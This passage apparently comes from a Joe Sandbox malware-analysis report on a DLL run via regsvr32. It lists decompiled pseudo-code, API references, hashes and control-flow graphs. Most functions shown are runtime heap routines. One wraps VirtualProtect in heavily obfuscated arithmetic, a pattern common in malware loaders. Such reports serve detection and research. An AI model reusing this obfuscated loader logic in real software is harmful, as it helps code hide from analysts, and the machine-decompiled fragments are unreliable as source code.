                                                                        				 *((intOrPtr*)(_t54 + 0x84)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x54)) = 0;
                                                                        				 *((short*)(_t54 + 0x8e)) = 0;
                                                                        				 *((short*)(_t54 + 0x8c)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x44)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x88)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x7c)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x80)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x6c)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x70)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x90)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x98)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x58)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x68)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x94)) = 0x200;
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
                                                                        				return _t54;
                                                                        			}







                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 100350EF
                                                                          • Part of subcall function 10035766: __EH_prolog.LIBCMT ref: 1003576B
                                                                        • GetCurrentThread.KERNEL32 ref: 1003513D
                                                                        • GetCurrentThreadId.KERNEL32 ref: 10035146
                                                                          • Part of subcall function 10011F76: _strlen.LIBCMT ref: 10011F80
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentH_prologThread$_strlen
                                                                        • String ID:
                                                                        • API String ID: 1650857145-0
                                                                        • Opcode ID: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
                                                                        • Instruction ID: 61552a51ecdf068f7bb4f9f9d17d647312d48b00674ee0c1313581d8a4369c28
                                                                        • Opcode Fuzzy Hash: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
                                                                        • Instruction Fuzzy Hash: 44218CB0800B509FD321CF6AD44569AFBF8FFA4641F10891FE5AA8BB21CBB5A541CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 172 10005090-10005097 173 100050a0-100050ab call 10004780 172->173 174 10005099-1000509a ExitProcess 172->174 177 100050b0-100050b2 173->177
                                                                        C-Code - Quality: 64%
                                                                        			E10005090() {
                                                                        				int _t1;
                                                                        
                                                                        				_t1 =  *0x1004d408; // 0x2f0ec70
                                                                        				if(_t1 == 0) {
                                                                        					ExitProcess(_t1);
                                                                        				}
                                                                        				_push("DllRegisterServer");
                                                                        				_push(_t1);
                                                                        				 *((intOrPtr*)(E10004780()))(); // executed
                                                                        				return 0;
                                                                        			}





                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID: DllRegisterServer
                                                                        • API String ID: 621844428-1663957109
                                                                        • Opcode ID: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
                                                                        • Instruction ID: 3990abb4a36e91ec48151b626d133cf46f0332b691c0db4f0bfff747b4acf562
                                                                        • Opcode Fuzzy Hash: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
                                                                        • Instruction Fuzzy Hash: 5BC08CB1A002191BE601EBF29C8CE0B329C8B801877020414F100D2005EF30E10002A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 178 1001382a-10013842 call 10012514 181 10013845-1001384d 178->181 182 10013844 178->182 183 100138b4-100138b6 181->183 184 1001384f-10013856 181->184 182->181 187 100138b8-100138be 183->187 188 100138dd 183->188 185 10013858-1001386a 184->185 186 1001389f-100138a1 184->186 185->186 189 1001386c-1001388f call 10013a38 call 1001437a call 100138d4 185->189 186->188 191 100138a3-100138b2 RtlAllocateHeap 186->191 187->188 192 100138c0-100138c9 call 10014676 187->192 190 100138df-100138e4 call 1001254f 188->190 189->191 204 10013891-1001389c call 10011c50 189->204 191->183 192->181 199 100138cf 192->199 199->190 204->186
                                                                        C-Code - Quality: 76%
                                                                        			E1001382A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				void* _t17;
                                                                        				long _t23;
                                                                        				long _t31;
                                                                        				void* _t33;
                                                                        				void* _t34;
                                                                        				void* _t40;
                                                                        
                                                                        				_push(0x10);
                                                                        				_push(0x10041e40);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				_t31 =  *(_t33 + 8) *  *(_t33 + 0xc);
                                                                        				 *(_t33 - 0x20) = _t31;
                                                                        				if(_t31 == 0) {
                                                                        					_t31 = _t31 + 1;
                                                                        				}
                                                                        				do {
                                                                        					_t28 = 0;
                                                                        					 *(_t33 - 0x1c) = 0;
                                                                        					if(_t31 > 0xffffffe0) {
                                                                        						L9:
                                                                        						if(_t28 != 0 ||  *0x1004f58c == _t28) {
                                                                        							L13:
                                                                        							_t15 = _t28;
                                                                        							L14:
                                                                        							return E1001254F(_t15);
                                                                        						} else {
                                                                        							goto L11;
                                                                        						}
                                                                        					}
                                                                        					if( *0x10050a64 != 3) {
                                                                        						L7:
                                                                        						if(_t28 != 0) {
                                                                        							goto L13;
                                                                        						}
                                                                        						L8:
                                                                        						_t17 = RtlAllocateHeap( *0x10050a60, 8, _t31); // executed
                                                                        						_t28 = _t17;
                                                                        						goto L9;
                                                                        					}
                                                                        					_t31 = _t31 + 0x0000000f & 0xfffffff0;
                                                                        					 *(_t33 + 0xc) = _t31;
                                                                        					_t23 =  *(_t33 - 0x20);
                                                                        					_t40 = _t23 -  *0x10050a50; // 0x0
                                                                        					if(_t40 > 0) {
                                                                        						goto L7;
                                                                        					}
                                                                        					E10013A38(_t23, 0, 4);
                                                                        					 *(_t33 - 4) =  *(_t33 - 4) & 0;
                                                                        					_push(_t23);
                                                                        					 *(_t33 - 0x1c) = E1001437A();
                                                                        					 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
                                                                        					E100138D4();
                                                                        					_t28 =  *(_t33 - 0x1c);
                                                                        					if(_t28 == 0) {
                                                                        						goto L8;
                                                                        					}
                                                                        					E10011C50(_t28, 0,  *(_t33 - 0x20));
                                                                        					_t34 = _t34 + 0xc;
                                                                        					goto L7;
                                                                        					L11:
                                                                        				} while (E10014676(_t31) != 0);
                                                                        				goto L14;
                                                                        			}










                                                                        APIs
                                                                        • __lock.LIBCMT ref: 1001386E
                                                                        • RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap__lock
                                                                        • String ID:
                                                                        • API String ID: 4078605025-0
                                                                        • Opcode ID: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
                                                                        • Instruction ID: 7e3eb1e6f8f5fb1ab58181eb2bcb74cf9bd6752373f8cd469f9ee3675e8c65d6
                                                                        • Opcode Fuzzy Hash: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
                                                                        • Instruction Fuzzy Hash: D711EF36D0076A9ADB01DBA48C41B9DB771FF807A0F12811AFC646F2E1DF34D9808B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 207 100107c8-100107d9 call 10012514 210 10010833-10010838 call 1001254f 207->210 211 100107db-100107e2 207->211 213 10010824 211->213 214 100107e4-100107fc call 10013a38 call 10013b9b 211->214 215 10010825-1001082d RtlFreeHeap 213->215 221 10010807-10010814 call 1001081b 214->221 222 100107fe-10010806 call 10013bc6 214->222 215->210 221->210 227 10010816-10010819 221->227 222->221 227->215
                                                                        C-Code - Quality: 18%
                                                                        			E100107C8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				char _t9;
                                                                        				intOrPtr _t12;
                                                                        				intOrPtr _t21;
                                                                        				void* _t22;
                                                                        
                                                                        				_push(0xc);
                                                                        				_push(0x10041d10);
                                                                        				_t9 = E10012514(__ebx, __edi, __esi);
                                                                        				_t21 =  *((intOrPtr*)(_t22 + 8));
                                                                        				if(_t21 != 0) {
                                                                        					if( *0x10050a64 != 3) {
                                                                        						_push(_t21);
                                                                        						goto L7;
                                                                        					} else {
                                                                        						E10013A38(__ebx, __edi, 4);
                                                                        						 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
                                                                        						_t12 = E10013B9B(_t21);
                                                                        						 *((intOrPtr*)(_t22 - 0x1c)) = _t12;
                                                                        						if(_t12 != 0) {
                                                                        							_push(_t21);
                                                                        							_push(_t12);
                                                                        							E10013BC6();
                                                                        						}
                                                                        						 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
                                                                        						_t9 = E1001081B();
                                                                        						if( *((intOrPtr*)(_t22 - 0x1c)) == 0) {
                                                                        							_push( *((intOrPtr*)(_t22 + 8)));
                                                                        							L7:
                                                                        							_push(0);
                                                                        							_t9 = RtlFreeHeap( *0x10050a60); // executed
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E1001254F(_t9);
                                                                        			}








                                                                        APIs
                                                                        • __lock.LIBCMT ref: 100107E6
                                                                          • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                        • RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalEnterFreeHeapSection__lock
                                                                        • String ID:
                                                                        • API String ID: 3012239193-0
                                                                        • Opcode ID: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
                                                                        • Instruction ID: e2f95eda502a26e356ba5135cb18e14e48cd53293581a9dd67e0285628cf36ea
                                                                        • Opcode Fuzzy Hash: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
                                                                        • Instruction Fuzzy Hash: C0F09635D0A215AAEB10DB60CC46B4E3B64EF00760F208014F5906D0D1DF74E5C0CAD5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 228 1001070f-10010725 call 10012514 231 10010755-10010757 228->231 232 10010727-1001072d 228->232 233 10010759 231->233 234 1001075a-10010761 231->234 232->231 235 1001072f-10010753 call 10013a38 call 1001437a call 10010781 232->235 233->234 236 10010763-10010766 234->236 237 10010769-10010772 RtlAllocateHeap 234->237 235->231 239 10010778-1001077d call 1001254f 235->239 236->237 237->239
                                                                        C-Code - Quality: 63%
                                                                        			E1001070F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				long _t19;
                                                                        				void* _t21;
                                                                        				void* _t24;
                                                                        
                                                                        				_push(0xc);
                                                                        				_push(0x10041d00);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				_t19 =  *(_t21 + 8);
                                                                        				if( *0x10050a64 != 3) {
                                                                        					L3:
                                                                        					if(_t19 == 0) {
                                                                        						_t19 = _t19 + 1;
                                                                        					}
                                                                        					if( *0x10050a64 != 1) {
                                                                        						_t19 = _t19 + 0x0000000f & 0xfffffff0;
                                                                        					}
                                                                        					_t9 = RtlAllocateHeap( *0x10050a60, 0, _t19); // executed
                                                                        				} else {
                                                                        					_t24 = _t19 -  *0x10050a50; // 0x0
                                                                        					if(_t24 > 0) {
                                                                        						goto L3;
                                                                        					} else {
                                                                        						E10013A38(__ebx, __edi, 4);
                                                                        						 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
                                                                        						_push(_t19);
                                                                        						 *(_t21 - 0x1c) = E1001437A();
                                                                        						 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
                                                                        						E10010781();
                                                                        						_t9 =  *(_t21 - 0x1c);
                                                                        						if( *(_t21 - 0x1c) == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E1001254F(_t9);
                                                                        			}







                                                                        APIs
                                                                        • __lock.LIBCMT ref: 10010731
                                                                          • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                        • RtlAllocateHeap.NTDLL(00000000,?,10041D00,0000000C,1001079A,000000E0,100107C5,?,100139BB,00000018,10041E50,00000008,10013A51,?,?), ref: 10010772
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateCriticalEnterHeapSection__lock
                                                                        • String ID:
                                                                        • API String ID: 409319249-0
                                                                        • Opcode ID: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
                                                                        • Instruction ID: 42b023ab18c65cc465c375f16582ad1359b716bf9f3aedd515ba29da9f54a78b
                                                                        • Opcode Fuzzy Hash: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
                                                                        • Instruction Fuzzy Hash: 1DF06D75E45665ABEB10EB708C4AB8D7BB4FB003A1F150114F9A1AE1E1D7B0BAC08E95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 247 10013a83-10013aa1 HeapCreate 248 10013aa3-10013ab0 call 10013a69 247->248 249 10013acd-10013acf 247->249 252 10013ad0-10013ad3 248->252 253 10013ab2-10013abf call 10013b53 248->253 253->252 256 10013ac1-10013ac7 HeapDestroy 253->256 256->249
                                                                        C-Code - Quality: 100%
                                                                        			E10013A83(intOrPtr _a4) {
                                                                        				void* _t6;
                                                                        				intOrPtr _t8;
                                                                        
                                                                        				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                        				 *0x10050a60 = _t6;
                                                                        				if(_t6 == 0) {
                                                                        					L4:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t8 = E10013A69();
                                                                        					 *0x10050a64 = _t8;
                                                                        					if(_t8 != 3 || E10013B53(0x3f8) != 0) {
                                                                        						return 1;
                                                                        					} else {
                                                                        						HeapDestroy( *0x10050a60);
                                                                        						goto L4;
                                                                        					}
                                                                        				}
                                                                        			}






                                                                        APIs
                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,10011217,00000001,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013A94
                                                                          • Part of subcall function 10013B53: HeapAlloc.KERNEL32(00000000,00000140,10013ABC,000003F8,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B60
                                                                        • HeapDestroy.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013AC7
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocCreateDestroy
                                                                        • String ID:
                                                                        • API String ID: 2236781399-0
                                                                        • Opcode ID: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
                                                                        • Instruction ID: e8a57e519fdf56151fc66cac883b31846c607769bf618c359d49edee3f1857a7
                                                                        • Opcode Fuzzy Hash: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
                                                                        • Instruction Fuzzy Hash: 6BE01A74A953559EEB01EB718C45B1A37E4EB44682F488829F442CD4A1EB70D680A602
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 257 10003310-10003320 258 10003322-1000332a 257->258 259 1000332b-10003374 257->259 260 100033fa-100034e1 259->260 261 1000337a-10003387 259->261 264 10003500-1000356c VirtualProtect 260->264 265 100034e3-100034fc 260->265 262 10003389-1000338e 261->262 263 100033ed-100033f9 261->263 266 10003390-1000339c 262->266 267 100033cd-100033ea 262->267 265->264 266->267 268 1000339e-100033cb 266->268 267->263 268->263 268->267
                                                                        C-Code - Quality: 89%
                                                                        			E10003310() {
                                                                        				long _t80;
                                                                        				signed int _t83;
                                                                        				signed int _t87;
                                                                        				intOrPtr _t91;
                                                                        				signed int _t101;
                                                                        				signed int _t116;
                                                                        				signed int _t122;
                                                                        				intOrPtr _t126;
                                                                        				signed int _t127;
                                                                        				signed int _t132;
                                                                        				signed int _t135;
                                                                        				intOrPtr* _t137;
                                                                        				intOrPtr* _t141;
                                                                        				signed int _t150;
                                                                        				signed int _t158;
                                                                        				signed int _t165;
                                                                        				signed int _t175;
                                                                        				signed int _t186;
                                                                        				signed int _t216;
                                                                        				signed int _t223;
                                                                        				signed int _t227;
                                                                        				intOrPtr _t235;
                                                                        				signed int _t238;
                                                                        				void* _t239;
                                                                        
                                                                        				_t80 =  *(_t239 + 0x18);
                                                                        				_t126 =  *((intOrPtr*)(_t80 + 8));
                                                                        				 *((intOrPtr*)(_t239 + 8)) = _t126;
                                                                        				if(_t126 != 0) {
                                                                        					_t132 =  *(_t80 + 0xc);
                                                                        					_t127 =  *0x1004b0dc; // 0x0
                                                                        					_t5 = _t127 + 1; // 0x1
                                                                        					_t101 =  *0x1004b0ec; // 0x0
                                                                        					_t165 =  *0x1004b0e0; // 0x0
                                                                        					_t7 = _t165 + 0x1000000; // 0x1000000
                                                                        					_t83 =  *0x1004b0e4; // 0x0
                                                                        					_t150 =  *0x1004b0d8; // 0x0
                                                                        					 *(_t239 + 0x10) = _t132;
                                                                        					if((_t132 & _t83 * 0x7fffffff + _t165 + _t7 - _t5 * _t127 + _t101 + _t150 << 0x00000001) == 0) {
                                                                        						_t35 = _t83 * _t165 + 1; // 0x1
                                                                        						 *(_t239 + 0x1c) = _t83 * _t165;
                                                                        						_t135 =  *0x1004b0e8; // 0x0
                                                                        						asm("sbb ebp, ebp");
                                                                        						asm("sbb edi, edi");
                                                                        						_t216 =  *0x1004b0d8; // 0x0
                                                                        						_t223 =  *0x1004b0d8; // 0x0
                                                                        						asm("sbb esi, esi");
                                                                        						_t158 =  *0x1004b0ec; // 0x0
                                                                        						 *(_t239 + 0x14) =  *(0x1004b0f4 + ( ~( ~(_t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 + _t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 - 0x80000000 &  *(_t239 + 0x10))) + ( ~( ~(0x40000000 + ((_t35 * 0x3fffffff + _t135) * _t127 + (_t135 * _t165 + 0x00000001) * _t150) * 0x00000004 &  *(_t239 + 0x10))) +  ~( ~(_t150 + _t135 * 0x00000002 + _t135 + _t150 + _t135 * 0x00000002 + _t135 + 0x20000000 &  *(_t239 + 0x10))) * 2) * 2) * 4);
                                                                        						_t175 =  *0x1004b0e0; // 0x0
                                                                        						_t116 = _t158 * _t127;
                                                                        						if(( *(_t239 + 0x10) & (_t116 * _t127 + _t116 * _t127 * 0x00000002 - 0x00000006) * _t127 + _t175 + _t175 - _t135 - _t158 + _t83 + _t223 + (_t175 + _t175 - _t135 - _t158 + _t83 + _t223) * 0x00000002 + 0x04000000) != 0) {
                                                                        							 *(_t239 + 0x14) =  *(_t239 + 0x14) | _t158 * _t83 *  *0x1004b0e0 + 0x00000200 + _t158 * _t83 *  *0x1004b0e0 * 0x00000002;
                                                                        						}
                                                                        						_t186 =  *0x1004b0e0; // 0x0
                                                                        						_t227 = _t158 * 0x3fffffff;
                                                                        						_t122 =  *0x1004b0d8; // 0x0
                                                                        						_t74 = _t227 + 1; // 0x1
                                                                        						_t87 = VirtualProtect( *( *(_t239 + 0x30)),  *((intOrPtr*)(_t239 + 0x20)) + (_t83 * 0x3fffffff + (_t122 + _t74) * _t186 + _t122 + (2 -  *((intOrPtr*)(_t239 + 0x24)) - _t135 - _t158) * _t127) * 4,  *(_t239 + 0x18), _t239 + 0x28 + ((_t116 + _t135) * _t158 + _t186) * 8); // executed
                                                                        						asm("sbb eax, eax");
                                                                        						return  ~( ~_t87);
                                                                        					} else {
                                                                        						_t137 =  *((intOrPtr*)(_t239 + 0x28));
                                                                        						_t235 =  *_t137;
                                                                        						 *((intOrPtr*)(_t239 + 0x28)) = _t235;
                                                                        						if(_t235 ==  *((intOrPtr*)(_t137 + 4))) {
                                                                        							if( *((intOrPtr*)(_t137 + 0x10)) != 0) {
                                                                        								L7:
                                                                        								_t91 =  *((intOrPtr*)(_t239 + 0x24));
                                                                        								 *((intOrPtr*)(_t91 + 0x20))( *(_t239 + 0x30),  *(_t239 + 0x1c), 0x4000 - _t101,  *((intOrPtr*)(_t91 + 0x34)));
                                                                        							} else {
                                                                        								_t141 =  *((intOrPtr*)(_t239 + 0x24));
                                                                        								_t238 =  *(_t141 + 0x3c);
                                                                        								if( *((intOrPtr*)( *_t141 + 0x38)) == _t238 || (_t150 + 2) * _t101 + _t83 + _t165 * 2 + ((_t150 + 2) * _t101 + _t83 + _t165 * 2) * 2 - (_t83 * _t127 * _t127 + 3 + _t83 * _t127 * _t127 * 2) *  *0x1004b0e8 +  *(_t239 + 0x18) % _t238 == 0) {
                                                                        									goto L7;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						return 1;
                                                                        					}
                                                                        				} else {
                                                                        					return 1;
                                                                        				}
                                                                        			}




























                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
                                                                        • Instruction ID: 1dc449bc3d80b5784a3a7ae21000a0fc3896a9c870339c3573936ee24331a343
                                                                        • Opcode Fuzzy Hash: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
                                                                        • Instruction Fuzzy Hash: 1A7129335043298FD314DF58C9C1646B7E9FB89310F058A2EDD699B3A5E670FE098AC4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 270 10037855-10037867 call 10011bf0 273 10037897-100378a8 call 10037552 270->273 274 10037869-10037871 270->274 283 100378aa-100378b8 call 10037732 273->283 284 100378bd-100378cc 273->284 275 10037873-1003788a call 1003768d 274->275 276 10037890 call 10037446 274->276 275->276 282 10037895 276->282 282->273 283->284
                                                                        C-Code - Quality: 94%
                                                                        			E10037855(intOrPtr* __ecx) {
                                                                        				intOrPtr _t12;
                                                                        				intOrPtr _t14;
                                                                        				signed char* _t15;
                                                                        				long* _t17;
                                                                        				long* _t19;
                                                                        				intOrPtr _t23;
                                                                        				intOrPtr* _t26;
                                                                        				void* _t28;
                                                                        
                                                                        				E10011BF0(0x1003aa13, _t28);
                                                                        				_push(__ecx);
                                                                        				_t26 = __ecx;
                                                                        				if( *__ecx == 0) {
                                                                        					_t20 =  *0x1004eff0; // 0x1004eff4
                                                                        					if(_t20 == 0) {
                                                                        						 *((intOrPtr*)(_t28 - 0x10)) = 0x1004eff4;
                                                                        						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
                                                                        						_t15 = E1003768D(0x1004eff4);
                                                                        						 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
                                                                        						_t20 = _t15;
                                                                        						 *0x1004eff0 = _t15; // executed
                                                                        					}
                                                                        					_t14 = E10037446(_t20); // executed
                                                                        					 *_t26 = _t14;
                                                                        				}
                                                                        				_t17 =  *0x1004eff0; // 0x1004eff4
                                                                        				_t23 = E10037552(_t17,  *_t26);
                                                                        				if(_t23 == 0) {
                                                                        					_t12 =  *((intOrPtr*)(_t28 + 8))();
                                                                        					_t19 =  *0x1004eff0; // 0x1004eff4
                                                                        					_t23 = _t12;
                                                                        					E10037732(_t19,  *_t26, _t23);
                                                                        				}
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
                                                                        				return _t23;
                                                                        			}












                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1003785A
